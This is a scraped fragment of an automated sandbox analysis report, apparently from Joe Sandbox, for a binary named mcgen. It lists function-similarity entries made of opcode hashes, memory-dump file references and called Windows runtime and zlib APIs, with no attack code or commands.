                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                                                                                                                                                                                                                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                                                    • API String ID: 808467561-2761157908
                                                                                                                                                                                                                                                                    • Opcode ID: 5eb30dd7dc62229e37aa5031b27090d50e2656cb9eae334aa241f26caa9cb01e
                                                                                                                                                                                                                                                                    • Instruction ID: 88640b59e6e4a52b6569a94c6933650c5ad6aa15132693da438acdef858c2e77
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5eb30dd7dc62229e37aa5031b27090d50e2656cb9eae334aa241f26caa9cb01e
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2CB2BD72E1C2928AE7748E79D440BFD77A9FB443AAF505135DB0D97A88DF3CA9008B41
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
                                                                                                                                                                                                                                                                    • API String ID: 0-2665694366
                                                                                                                                                                                                                                                                    • Opcode ID: 183baba8c618070380c74d0f680cff30a06716a401d1faaba0935d79222a4dc0
                                                                                                                                                                                                                                                                    • Instruction ID: 30824cea8c7b405e9e24bb6d52d9c5e109bc7a0fae373c4c29b0cf2357093921
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 183baba8c618070380c74d0f680cff30a06716a401d1faaba0935d79222a4dc0
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9D52E3B2A146B68BD7948F29C458B7E3BADEB45752F024139E74A87784DF3CD844CB80
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3140674995-0
                                                                                                                                                                                                                                                                    • Opcode ID: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
                                                                                                                                                                                                                                                                    • Instruction ID: a10eb50ef8d3c616057b37d137d934aebbc826aeae8d3f015f728331e9156540
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 96313A72608A8186EB648F65E8903EE7368FB8575AF04453ADB4E87B94EF3CD548C710
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • _get_daylight.LIBCMT ref: 00007FF6B9F35CB5
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6B9F35608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6B9F3561C
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6B9F2A9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF6B9F32D92,?,?,?,00007FF6B9F32DCF,?,?,00000000,00007FF6B9F33295,?,?,?,00007FF6B9F331C7), ref: 00007FF6B9F2A9CE
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6B9F2A9B8: GetLastError.KERNEL32(?,?,?,00007FF6B9F32D92,?,?,?,00007FF6B9F32DCF,?,?,00000000,00007FF6B9F33295,?,?,?,00007FF6B9F331C7), ref: 00007FF6B9F2A9D8
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6B9F2A970: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF6B9F2A94F,?,?,?,?,?,00007FF6B9F2A83A), ref: 00007FF6B9F2A979
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6B9F2A970: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6B9F2A94F,?,?,?,?,?,00007FF6B9F2A83A), ref: 00007FF6B9F2A99E
                                                                                                                                                                                                                                                                    • _get_daylight.LIBCMT ref: 00007FF6B9F35CA4
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6B9F35668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6B9F3567C
                                                                                                                                                                                                                                                                    • _get_daylight.LIBCMT ref: 00007FF6B9F35F1A
                                                                                                                                                                                                                                                                    • _get_daylight.LIBCMT ref: 00007FF6B9F35F2B
                                                                                                                                                                                                                                                                    • _get_daylight.LIBCMT ref: 00007FF6B9F35F3C
                                                                                                                                                                                                                                                                    • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6B9F3617C), ref: 00007FF6B9F35F63
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 4070488512-0
                                                                                                                                                                                                                                                                    • Opcode ID: 76424cc0ec02945f4fd2ccc640ea60475aa997d4131cc6c9dd67359800dfdabb
                                                                                                                                                                                                                                                                    • Instruction ID: 0afe2a64c5a1336b23af8fc8b3dc956ec8cab5e4881cc7eee203a1a5dc21c1c3
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 76424cc0ec02945f4fd2ccc640ea60475aa997d4131cc6c9dd67359800dfdabb
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 37D1BF22A0C65286EB30AF3ED8511B97769EF847A6F458136EB0DC7A86DF3CE441C741
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1239891234-0
                                                                                                                                                                                                                                                                    • Opcode ID: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
                                                                                                                                                                                                                                                                    • Instruction ID: 554166fb708fbcfe1c38927b2b8ea5ed09b9d8b815a126f6b8ad0dba66467519
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9C316132618B8186DB60CF39E8502AE73A8FB897A9F540135EB9D83B94DF3CC145CB00
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2227656907-0
                                                                                                                                                                                                                                                                    • Opcode ID: 5fde642f47360a120b3bbdc49a752417dcdc94f7dd720a243365bab1f94d45be
                                                                                                                                                                                                                                                                    • Instruction ID: 3e3785c8f7471dabcde35467f02e302d938a7ba00b2274936866cd6952efa076
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5fde642f47360a120b3bbdc49a752417dcdc94f7dd720a243365bab1f94d45be
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F3B19022B1C69641EE719F3A94102BA63A9EB44BF6F449131EB5E87BC5EE3CE441C301
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • _get_daylight.LIBCMT ref: 00007FF6B9F35F1A
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6B9F35668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6B9F3567C
                                                                                                                                                                                                                                                                    • _get_daylight.LIBCMT ref: 00007FF6B9F35F2B
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6B9F35608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6B9F3561C
                                                                                                                                                                                                                                                                    • _get_daylight.LIBCMT ref: 00007FF6B9F35F3C
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6B9F35638: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6B9F3564C
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6B9F2A9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF6B9F32D92,?,?,?,00007FF6B9F32DCF,?,?,00000000,00007FF6B9F33295,?,?,?,00007FF6B9F331C7), ref: 00007FF6B9F2A9CE
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6B9F2A9B8: GetLastError.KERNEL32(?,?,?,00007FF6B9F32D92,?,?,?,00007FF6B9F32DCF,?,?,00000000,00007FF6B9F33295,?,?,?,00007FF6B9F331C7), ref: 00007FF6B9F2A9D8
                                                                                                                                                                                                                                                                    • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6B9F3617C), ref: 00007FF6B9F35F63
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3458911817-0
                                                                                                                                                                                                                                                                    • Opcode ID: 8084827ab6892e9bf44fc7ae7df730cc4e836e683a41a1d7f4ca7a201d78ec16
                                                                                                                                                                                                                                                                    • Instruction ID: ac1b9d1e3124378dd97f977c6bcc716ee98198e7d0911447f6ad6c6d7b41ddfb
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8084827ab6892e9bf44fc7ae7df730cc4e836e683a41a1d7f4ca7a201d78ec16
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 94516E32A1C64286E720DF3ED9815A97768BB887A5F408135EB4DC3B96DF3CE440C741
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2933794660-0
                                                                                                                                                                                                                                                                    • Opcode ID: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
                                                                                                                                                                                                                                                                    • Instruction ID: 34440b234048af7c0caae73a706fd96138bf31ed7102199fff99d2e117bcd4c8
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0A111C26B18B058AEB10CF79E8552B933A8FB19769F440E31DB6D877A4DF7CD1588340
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: memcpy_s
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1502251526-0
                                                                                                                                                                                                                                                                    • Opcode ID: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                                                                                                                                                                                    • Instruction ID: 6e27204c8650241e546bf33d386e96de512640f34691ed6bdcdb9adfbb834a5a
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 77C1E172B1C68A87EB34CF29A04466AB7A5F794B95F858134DB4E83784DF3DE844CB40
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: $header crc mismatch$unknown header flags set
                                                                                                                                                                                                                                                                    • API String ID: 0-1127688429
                                                                                                                                                                                                                                                                    • Opcode ID: 41de47797cb66f1826093f4b1d60416fd99d26d25a53ce6bfd127eaa39bdfb5e
                                                                                                                                                                                                                                                                    • Instruction ID: fbf704529857c100afd95aeadfd33a7347e28f4ea653886f5b739d89cf4ae08d
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 41de47797cb66f1826093f4b1d60416fd99d26d25a53ce6bfd127eaa39bdfb5e
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 76F184B2A183F58BE7958F1D8088B3A3AADEF46765F464539DB4987390CF38D581C780
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ExceptionRaise_clrfp
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 15204871-0
                                                                                                                                                                                                                                                                    • Opcode ID: 2f74b2cda317b12825bead48c90720a79ba1abfeed249303701d480a1679e454
                                                                                                                                                                                                                                                                    • Instruction ID: 729c38b1b6179367ff9bb466b291d2b4cdecc5f40f14c058201e0e4d1b662eb1
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2f74b2cda317b12825bead48c90720a79ba1abfeed249303701d480a1679e454
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 83B15877A18B89CAEB25CF2DC4463683BA0F784B69F148921DB5D837A5CF39D491C701
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: $
                                                                                                                                                                                                                                                                    • API String ID: 0-227171996
                                                                                                                                                                                                                                                                    • Opcode ID: 3098a868bf4d382f942c0283459ab4806c0f53f7eb332f8174ba39f6fc7772a0
                                                                                                                                                                                                                                                                    • Instruction ID: bb3c4394c00b2fe4ba5bf2b19029493131949138049934989211c9c5e44b8785
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3098a868bf4d382f942c0283459ab4806c0f53f7eb332f8174ba39f6fc7772a0
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C8E1A6B6A0868687EB688F2D805023DB3A8FF45F6AF144135FB4E87695DF79E851C700
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: incorrect header check$invalid window size
                                                                                                                                                                                                                                                                    • API String ID: 0-900081337
                                                                                                                                                                                                                                                                    • Opcode ID: 5aba513b73eb8988df982bd12c0510577381bb82701c7147ce4cedc0b53fa8f7
                                                                                                                                                                                                                                                                    • Instruction ID: e413a1defaac89465c48de46acfbfebb1537b47b3c9a43c1efa83c2af1aa1045
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5aba513b73eb8988df982bd12c0510577381bb82701c7147ce4cedc0b53fa8f7
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6A91B9B2A182F587E7A48E28C448B3E3A9DFF45761F524139DB4987794CF38D581CB80
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
